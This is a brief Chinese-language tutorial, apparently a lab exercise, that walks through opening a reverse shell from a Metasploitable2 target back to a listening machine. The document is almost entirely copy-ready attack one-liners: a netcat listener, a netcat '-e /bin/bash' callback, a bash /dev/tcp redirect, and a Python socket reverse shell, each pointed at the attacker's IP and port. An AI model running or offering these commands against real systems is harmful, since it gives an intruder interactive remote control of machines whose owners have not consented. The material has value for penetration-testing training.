一、環境
Aliyun Linux (192.168.47.136)
Metasploitable2 Linux (192.169.47.133)
目的: 将Metasploitable 的 shell 反彈給 Aliyun
二、具體實操
2.1 通過 linux 指令 NC
1、首先 Aliyun 偵聽某個端口 如 4444 端口
nc -nvlp 4444
2、Meta..上執行:
nc -e /bin/bash 192.168.47.136 4444
2.2 通過bash指令
1、首先 Aliyun 偵聽某個端口 如 4444 端口
nc -nvlp 4444
2、Meta..上執行:
bash -i >& /dev/tcp/192.168.47.136/4444 0>&1
2.3 通過python指令
1、首先 Aliyun 偵聽某個端口 如 4444 端口
nc -nvlp 4444
2、Meta..上執行:
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.47.136',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
以上就是一般 linux 系統自帶指令的利用反彈 shell 步驟了!
其他需要自己安裝配置的指令就不寫了!